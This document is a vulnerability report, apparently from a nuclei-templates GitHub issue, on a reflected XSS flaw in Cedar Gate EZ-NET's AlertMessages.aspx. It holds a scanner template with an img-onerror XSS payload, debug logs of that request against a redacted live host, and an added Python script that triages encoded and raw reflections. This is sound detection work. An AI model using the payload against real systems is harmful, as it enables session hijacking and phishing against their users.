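Vulnerability information
Vulnerability name: Cedar Gate EZ-NET <= 6.8.0 - Reflected XSS
Vulnerability ID:
Vulnerability type: Cross-site scripting (XSS)
Severity: Medium
Description: Affected product: Cedar Gate EZ-NET is network management software widely used in enterprise network environments to monitor and manage network devices. It provides a user-friendly interface that lets administrators handle network configuration and alert management.
Explanation: The vulnerability is in EZ-NET's AlertMessages.aspx page, where the Usertext parameter triggers a reflected cross-site scripting (XSS) flaw. An attacker can craft a malicious URL, and when a user visits it, the malicious script executes in the user's browser. The cause is that the application does not properly filter and encode user input, which lets an attacker inject executable JavaScript.
Impact analysis: This vulnerability lets an attacker execute arbitrary JavaScript in the context of the victim's browser, which can lead to session hijacking, phishing, or other malicious activity. Because it is a reflected XSS vulnerability, the attacker must lure a user into clicking a crafted link to exploit it. Although user interaction is required, the vulnerability still poses a threat to enterprise network security, especially in internal networks or trusted environments.
Vendor: Cedar Gate
Product: EZ-NET
Affected versions: <= 6.8.0
Source: https://github.com/projectdiscovery/nuclei-templates/issues/12590
Type: projectdiscovery/nuclei-templates: GitHub issues
Source summary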
```yaml
id: CVE-2022-23397

info:
  name: Cedar Gate EZ-NET <= 6.8.0 - Reflected XSS
  author: srilakivarma
  severity: medium
  description: |
    A reflected XSS vulnerability exists in /EZ-NET60/AlertMessages.aspx via the `Usertext` parameter.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23397
  classification:
    cve-id: CVE-2022-23397
    cwe-id: CWE-79
  tags: cve,xss,cedar,eznet,reflected

variables:
  xss_token: "{{randstr}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/EZ-NET60/AlertMessages.aspx?Usertext=%3Cimg%20src%3Dx%20onerror%3Dalert('{{xss_token}}')%3E"

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "<img src=x onerror=alert('{{xss_token}}')>"
          - "alert('{{xss_token}}')"
          - "<img src=x onerror=alert('{{xss_token}}')>"
      - type: regex
        part: body
        regex:
          - "alert\\(['\"]{{xss_token}}['\"]\\)"
```
Debug Data
```
[CVE-2022-23397] Dumped HTTP request for https://redact.com/EZ-NET60/AlertMessages.aspx?Usertext=%3Cimg%20src%3Dx%20onerror%3Dalert('2zqzyhThxS81lVyT5Xb8wgkFSKa')%3E

GET /EZ-NET60/AlertMessages.aspx?Usertext=%3Cimg%20src%3Dx%20onerror%3Dalert('2zqzyhThxS81lVyT5Xb8wgkFSKa')%3E HTTP/1.1
Host: redact.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2022-23397] Dumped HTTP response https://redact.com/EZ-NET60/AlertMessages.aspx?Usertext=%3Cimg%20src%3Dx%20onerror%3Dalert('2zqzyhThxS81lVyT5Xb8wgkFSKa')%3E

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Alt-Svc: h3=":443"; ma=86400
Cache-Control: private, no-store
Cf-Cache-Status: DYNAMIC
Cf-Ray: 95eee1078e813212-BOM
Content-Type: text/html; charset=utf-8
Date: Mon, 14 Jul 2025 06:14:18 GMT
Expires: Mon, 14 Jul 2025 06:14:18 GMT
Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
Pragma: no-cache
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=90lxDu8uhmCuN1Jt6wfFSn9rWc86QHSFH0ZZi%2BElkUazSSfivtdQme4s%2B8IaATkIlfIaVAaZvX0kVVeo8CbAeQ7CTgKgsHR3eIPFek1Z4L0v4Ng%3D"}]}
Server: cloudflare
Set-Cookie: EZNET_ASP.NET_SessionId=05db00yx04rf5obvskr5pwzo; HttpOnly; SameSite=Lax; Path=/
Strict-Transport-Security: max-age=31536000
X-Aspnet-Version: 4.0.30319

[CVE-2022-23397:word-1] [http] [medium] https://redact.com/EZ-NET60/AlertMessages.aspx?Usertext=%3Cimg%20src%3Dx%20onerror%3Dalert('2zqzyhThxS81lVyT5Xb8wgkFSKa')%3E
```
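The template's matchers are joined with `or`, so the bare `alert('{{xss_token}}')` word fires even when the server entity-encodes the angle brackets. The following is an added example for triaging such hits, not code from the issue or from nuclei; the function names and the sample response bodies are assumptions constructed for illustration.

```python
import html
import re

# Payload shape copied from the template on this page; the token differs per request.
PAYLOAD = "<img src=x onerror=alert('{token}')>"

def template_matchers_fire(body: str, token: str) -> bool:
    """Re-implement the template's `or` condition (word list plus regex)."""
    words = [PAYLOAD.format(token=token), f"alert('{token}')"]
    regex = re.compile(r"alert\(['\"]" + re.escape(token) + r"['\"]\)")
    return any(w in body for w in words) or bool(regex.search(body))

def classify_reflection(body: str, token: str) -> str:
    """Classify how the payload came back in an HTML response body."""
    payload = PAYLOAD.format(token=token)
    if payload in body:
        return "raw"       # tag reflected intact: the browser would parse it
    if token not in body:
        return "absent"
    if payload in html.unescape(body):
        return "encoded"   # only visible after entity decoding: output was encoded
    return "partial"       # token reflected but payload altered: review by hand

# Constructed response bodies (not captured from any real host).
TOKEN = "T0KEN"
SAMPLES = {
    "unencoded": "<span id=\"msg\"><img src=x onerror=alert('T0KEN')></span>",
    "brackets_encoded": "<span>&lt;img src=x onerror=alert('T0KEN')&gt;</span>",
    "fully_encoded": "<span>&lt;img src=x onerror=alert(&#39;T0KEN&#39;)&gt;</span>",
    "tag_stripped": "<span>alert('T0KEN')</span>",
    "not_reflected": "<span>No alerts</span>",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:17} matchers={template_matchers_fire(body, TOKEN)!s:5} "
              f"verdict={classify_reflection(body, TOKEN)}")
```

Only the `raw` verdict shows the tag reaching an HTML body context unencoded; a reflection inside a script block or an attribute value needs a context-aware check instead.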